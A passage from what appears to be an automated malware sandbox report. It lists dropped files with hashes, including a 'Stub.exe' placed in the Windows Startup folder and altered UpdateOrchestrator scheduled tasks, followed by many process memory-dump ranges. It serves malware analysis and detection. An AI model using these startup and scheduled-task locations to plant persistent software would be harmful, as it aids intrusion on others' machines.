                                                                                                                                                                        e6cbd5ee0a321d30889ce2ecae4a490338d5f72386dea28ce1f71f7265517d1e97979da57eb5ef01f4e7f7b7e4935e0fa200ffde406bc2d8eaa6e043772df565

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        78c74df9245d611ddd9c10ff81ee4b73

                                                                                                                                                                        SHA1

                                                                                                                                                                        691a0b167241586ce8fe9ca84118461038c4de3d

                                                                                                                                                                        SHA256

                                                                                                                                                                        1061151c4633203de4fa13a96180215a8304f01cd581c74174b1383d998de4dc

                                                                                                                                                                        SHA512

                                                                                                                                                                        87c985657f7cdb239d7338c4f1e2b96c038c110ae0c32376025045e4716f5931983dad9b195f6874e27e518451a6baca49173163320981f5f72ddebc19e7c261

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oh5n3fqp.xcl.ps1

                                                                                                                                                                        Filesize

                                                                                                                                                                        60B

                                                                                                                                                                        MD5

                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                        SHA1

                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                        SHA256

                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                        SHA512

                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        290KB

                                                                                                                                                                        MD5

                                                                                                                                                                        cc63633edfcc147cbaed1959b03d8730

                                                                                                                                                                        SHA1

                                                                                                                                                                        df7a250eba6ee1767b09f7923bfd735635deb9e8

                                                                                                                                                                        SHA256

                                                                                                                                                                        e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417

                                                                                                                                                                        SHA512

                                                                                                                                                                        a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                                                                        SHA1

                                                                                                                                                                        f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                                                                        SHA256

                                                                                                                                                                        7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                                                                        SHA512

                                                                                                                                                                        583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                                                                        SHA1

                                                                                                                                                                        1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                                                                        SHA256

                                                                                                                                                                        8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                                                                        SHA512

                                                                                                                                                                        537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                                                                      • memory/324-60-0x000002277C9D0000-0x000002277C9FA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/324-61-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/408-71-0x000001DC728A0000-0x000001DC728CA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/408-72-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/476-74-0x000001CE16B60000-0x000001CE16B8A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/476-75-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/620-47-0x000001C2475F0000-0x000001C247613000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        140KB

                                                                                                                                                                      • memory/620-49-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/620-48-0x000001C247620000-0x000001C24764A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/628-78-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/628-77-0x000001CD483B0000-0x000001CD483DA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/676-52-0x000002A91C1C0000-0x000002A91C1EA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/676-53-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/700-2-0x0000029A3B5E0000-0x0000029A3B602000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/700-12-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/700-13-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/700-18-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/700-14-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/700-15-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/876-374-0x00000000009B0000-0x0000000000A1C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/884-0-0x00007FFA50FE3000-0x00007FFA50FE5000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/884-37-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/884-31-0x00007FFA50FE0000-0x00007FFA51AA2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/884-1-0x0000000000740000-0x00000000007AC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/936-1281-0x0000000000700000-0x000000000076C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/956-56-0x000001CC4EBA0000-0x000001CC4EBCA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/956-57-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1048-68-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1048-67-0x0000018A9A2E0000-0x0000018A9A30A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1116-80-0x000002A134860000-0x000002A13488A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1116-81-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1152-91-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1152-90-0x000002DAD41D0000-0x000002DAD41FA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1168-94-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1168-93-0x000001CA55760000-0x000001CA5578A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1180-97-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1180-96-0x0000024DF9940000-0x0000024DF996A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1208-100-0x00007FFA2F630000-0x00007FFA2F640000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1208-99-0x0000020D0DB60000-0x0000020D0DB8A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1224-583-0x0000000000380000-0x00000000003EC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1312-102-0x000001E4B5090000-0x000001E4B50BA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1484-1708-0x0000000000330000-0x000000000039C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1516-1805-0x0000000000970000-0x00000000009DC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1576-784-0x00000000006C0000-0x000000000072C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1880-1774-0x00000000005A0000-0x000000000060C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1928-905-0x00000000000C0000-0x000000000012C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1956-1213-0x0000000000070000-0x00000000000DC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1964-1644-0x0000000000440000-0x00000000004AC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2000-511-0x0000000000050000-0x00000000000BC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2044-1177-0x00000000009F0000-0x0000000000A5C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2056-941-0x0000000000DA0000-0x0000000000E0C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2380-1741-0x0000000000100000-0x000000000016C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2432-1349-0x0000000000CC0000-0x0000000000D2C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2456-1078-0x0000000000050000-0x00000000000BC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2584-1838-0x00000000004C0000-0x000000000052C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2648-1042-0x0000000000DC0000-0x0000000000E2C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2912-1966-0x0000000000C80000-0x0000000000CEC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3032-676-0x00000000003A0000-0x000000000040C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3100-1244-0x0000000000460000-0x00000000004CC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3360-44-0x000002C758CB0000-0x000002C758CC2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                      • memory/3360-34-0x000002C73E2E0000-0x000002C73E32E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        312KB

                                                                                                                                                                      • memory/3360-36-0x000002C73E700000-0x000002C73E73E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        248KB

                                                                                                                                                                      • memory/3360-39-0x00007FFA6ED00000-0x00007FFA6EDBD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        756KB

                                                                                                                                                                      • memory/3360-38-0x00007FFA6F5B0000-0x00007FFA6F7A8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.0MB

                                                                                                                                                                      • memory/3616-1548-0x0000000000040000-0x00000000000AC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3664-642-0x0000000000720000-0x000000000078C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3852-1147-0x0000000000840000-0x00000000008AC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3920-1937-0x0000000000CE0000-0x0000000000D4C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4044-710-0x0000000000BB0000-0x0000000000C1C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4320-1582-0x0000000000650000-0x00000000006BC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4408-1418-0x00000000006D0000-0x000000000073C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4448-421-0x0000000000B60000-0x0000000000BCC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4468-1612-0x0000000000830000-0x000000000089C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4556-975-0x00000000009D0000-0x0000000000A3C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4596-1009-0x00000000004C0000-0x000000000052C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4688-43-0x00007FFA6ED00000-0x00007FFA6EDBD000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        756KB

                                                                                                                                                                      • memory/4688-45-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/4688-42-0x00007FFA6F5B0000-0x00007FFA6F7A8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.0MB

                                                                                                                                                                      • memory/4688-40-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/4688-41-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/4740-749-0x0000000000010000-0x000000000007C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4820-839-0x0000000000640000-0x00000000006AC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4912-471-0x0000000000F10000-0x0000000000F7C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/5072-818-0x0000000000250000-0x00000000002BC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/5084-1485-0x00000000004D0000-0x000000000053C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB